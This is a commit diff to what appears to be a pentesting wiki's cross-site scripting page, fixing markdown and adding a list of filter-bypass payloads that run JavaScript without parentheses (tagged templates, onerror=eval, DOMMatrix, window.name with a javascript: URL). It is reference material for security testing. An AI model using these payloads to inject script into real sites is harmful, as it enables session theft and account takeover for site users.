GitBook: [#3501] No subject
This commit is contained in:
parent
c6405d9dcc
commit
fd7e8de8d4
@ -201,7 +201,7 @@ Some **examples**:
|
||||
|
||||
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
|
||||
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
|
||||
_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
|
||||
_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_
|
||||
|
||||
In this case and if no black/whitelisting is used, you could use payloads like:
|
||||
|
||||
@ -595,12 +595,23 @@ eval(8680439..toString(30))(983801..toString(36))
|
||||
|
||||
**JavaScript without parentheses**
|
||||
|
||||
```javascript
|
||||
````javascript
|
||||
alert`1`
|
||||
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
|
||||
eval.call`${'alert\x2823\x29'}`
|
||||
eval.apply`${[`alert\x2823\x29`]}`
|
||||
```
|
||||
[].sort.call`${alert}1337`
|
||||
[].map.call`${eval}\\u{61}lert\x281337\x29`
|
||||
throw onerror=alert,1337
|
||||
Function`x${'alert\x281337\x29'}x```
|
||||
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
|
||||
valueOf=alert;window+''
|
||||
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
|
||||
// or any DOMXSS sink such as location=name
|
||||
|
||||
window.name='javascript:alert(1)'
|
||||
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
|
||||
````
|
||||
|
||||
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
|
||||
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
|
||||
@ -807,7 +818,7 @@ with(this)
|
||||
|
||||
### Obfuscation & Advanced Bypass
|
||||
|
||||
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) \*\*\*\*
|
||||
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
|
||||
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
|
||||
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
|
||||
* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
|
||||
@ -816,6 +827,7 @@ with(this)
|
||||
* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
|
||||
* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
|
||||
* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
|
||||
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
|
||||
|
||||
```javascript
|
||||
//Katana
|
||||
|
Loading…
Reference in New Issue
Block a user